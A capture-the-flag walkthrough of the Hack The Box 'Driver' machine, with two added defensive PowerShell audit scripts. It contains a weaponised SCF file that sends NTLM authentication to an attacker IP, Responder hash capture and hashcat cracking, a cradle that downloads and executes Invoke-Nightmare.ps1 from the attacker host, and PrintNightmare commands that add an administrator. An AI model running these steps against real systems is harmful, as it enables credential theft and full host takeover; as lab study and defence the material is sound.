Driver is a Windows box that introduces a common vulnerability/misconfiguration that attackers exploit regularly; in particular, it is about SCF file attacks.
Enumeration
NMAP
Nmap scan report for 10.10.11.106
Host is up (0.048s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2021-12-27T03:51:27
|_ start_date: 2021-12-27T00:53:05
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 7h02m15s, deviation: 0s, median: 7h02m14s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.43 seconds
WebPage on Port 80
The basic-auth realm names the user admin, so let's try the password admin as well... and we're in.
There is an upload option, so let's check that.
Checking the source confirms that 
Exploitation
Weaponize the Payload
luka@kali:~/htb/driver$ cat share.scf
[Shell]
Command=2
IconFile=\\10.10.14.18\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
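The file above works because Explorer fetches the icon from the UNC path in IconFile and authenticates to that host with NTLM as whoever browsed the share. A defender can look for the same pattern on their own shares. The script below is an added example, not part of the original write-up; it audits a share for .scf and .url files whose IconFile points at a UNC path and reports which host would receive the authentication. $SharePath is an assumption (a placeholder); point it at the share or folder to audit.

```powershell
# Added example, not part of the original write-up: audit a share for
# .scf/.url files whose IconFile points at a UNC path, the pattern used
# by share.scf above. $SharePath is an assumption; point it at the share
# (or local folder) you want to audit.
param(
    [string]$SharePath = '\\FILESERVER\share'   # placeholder, not a real host
)

# Matches "IconFile=\\host\anything" (leading whitespace tolerated;
# Select-String is case-insensitive by default)
$uncIconPattern = '^\s*IconFile\s*=\s*\\\\[^\\]+\\'

$suspicious = Get-ChildItem -Path $SharePath -Recurse -File -Include '*.scf', '*.url' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        Select-String -Path $file.FullName -Pattern $uncIconPattern | ForEach-Object {
            # Everything after the first '=' is the icon path
            $target = ($_.Line -split '=', 2)[1].Trim()
            [pscustomobject]@{
                File     = $file.FullName
                IconHost = ($target -split '\\')[2]   # host that receives the NTLM authentication
                IconFile = $target
                Owner    = (Get-Acl -LiteralPath $file.FullName).Owner   # who planted it
                Modified = $file.LastWriteTime
            }
        }
    }

if ($suspicious) {
    $suspicious | Format-Table -AutoSize
} else {
    "No .scf/.url files with UNC icon paths under $SharePath"
}
```

Run it from any host that can read the share. Any hit whose IconHost is not one of your own file servers is a planted file, and Owner and Modified tell you who wrote it and when. Note also the nmap output above: SMB message signing is disabled on the target, so a captured authentication could be relayed as well as cracked; requiring SMB signing and blocking outbound SMB (TCP 445) to untrusted networks limits both.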
Start Responder
sudo responder -I tun1

tony::DRIVER:9f5260851ec10f7a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
Crack the Hash
Using hashcat
.\hashcat.exe -m 5600 -a 0 hash.txt .\rockyou.txt --force

WinRM to the box
luka@kali:~$ /home/luka/tools/evil-winrm/evil-winrm.rb -u tony -p liltony -i 10.10.11.106
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Privilege Escalation
This post was a great help: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
PrintNightmare Enumeration
Let's check two things: RPC and SMB access using tony's credentials.
luka@kali:~/htb/driver$ rpcclient -U 'tony%liltony' 10.10.11.106
rpcclient $>
So RPC - Check! SMB?
luka@kali:~/htb/driver$ smbmap -H 10.10.11.106 -u tony -p liltony
[+] IP: 10.10.11.106:445 Name: 10.10.11.106
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Check. We do have SMB access as tony/liltony (IPC$ is readable).
RPC can also be checked with rpcdump.py:
luka@kali:~$ rpcdump.py @10.10.11.106 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol
PrintNightmare Exploitation
Invoke-Nightmare
(new-object system.net.webclient).downloadstring('http://10.10.14.18/Invoke-Nightmare.ps1') | IEX
Use Invoke-Nightmare to create a user that will be added to the Administrators group.
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -NewUser "luka" -NewPassword "Password01!"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user luka as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
As you can see, there I am: my new user is an Administrator.
*Evil-WinRM* PS C:\Users\tony\Documents> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
luka
The command completed successfully.
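What made the escalation possible is that the spooler was running, reachable over RPC (the MS-RPRN endpoint found with rpcdump.py) and willing to load a driver for a non-administrator. The script below is an added example, not from the original write-up or from the Invoke-Nightmare project; it audits those three conditions on a Windows host and prints what to change. It reads only the documented Point and Print policy values and the spooler service state, and the remediation commands are left commented so the audit itself is read-only.

```powershell
# Added example, not part of the original write-up: check a Windows host for
# the spooler settings that decide whether a non-admin can load a printer
# driver (what Invoke-Nightmare relies on) and report what to change.
# Run in an elevated PowerShell session on the host being audited.
$ppKey      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$printerKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'

function Get-RegValueOrNull([string]$Path, [string]$Name) {
    try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value not present
}

$spooler  = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$restrict = Get-RegValueOrNull $ppKey 'RestrictDriverInstallationToAdministrators'
$noWarn   = Get-RegValueOrNull $ppKey 'NoWarningNoElevationOnInstall'
$update   = Get-RegValueOrNull $ppKey 'UpdatePromptSettings'
$remote   = Get-RegValueOrNull $printerKey 'RegisterSpoolerRemoteRpcEndPoint'

$findings = @()
if ($spooler -and $spooler.Status -eq 'Running') {
    $findings += "Spooler is running (start type $($spooler.StartType)). Disable it on hosts that never print."
}
if ($restrict -ne 1) {
    $findings += "RestrictDriverInstallationToAdministrators is not explicitly 1 (value: '$restrict'). Set it to 1 so only administrators can install drivers."
}
if ($noWarn -eq 1) {
    $findings += "NoWarningNoElevationOnInstall is 1, which suppresses the Point and Print elevation prompt. Set it to 0."
}
if ($null -ne $update -and $update -ne 0) {
    $findings += "UpdatePromptSettings is $update. Set it to 0."
}
if ($remote -ne 2) {
    $findings += "'Allow Print Spooler to accept client connections' is not disabled (RegisterSpoolerRemoteRpcEndPoint: '$remote'). Set it to 2 on hosts that are not print servers; this is what exposes MS-RPRN remotely."
}

if ($findings.Count -eq 0) { 'No PrintNightmare-related weaknesses found.' } else { $findings }

# Remediation for a host that does not need to print (run as administrator):
#   Stop-Service -Name Spooler
#   Set-Service  -Name Spooler -StartupType Disabled
# For a host that must keep the spooler, enforce admin-only driver installs:
#   New-Item -Path $ppKey -Force | Out-Null
#   Set-ItemProperty -Path $ppKey -Name RestrictDriverInstallationToAdministrators -Value 1 -Type DWord
#   Set-ItemProperty -Path $ppKey -Name NoWarningNoElevationOnInstall -Value 0 -Type DWord
#   Set-ItemProperty -Path $ppKey -Name UpdatePromptSettings -Value 0 -Type DWord
```

On hosts that have the August 2021 cumulative update installed, an absent RestrictDriverInstallationToAdministrators value already defaults to 1; the script still flags it so that the setting is made explicit and survives a policy rewrite. Pair the audit with the enumeration shown above: rpcdump.py no longer listing MS-RPRN is the quickest external confirmation that the remote endpoint is closed.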
So that's it: we can log in using our new user and grab the flag.
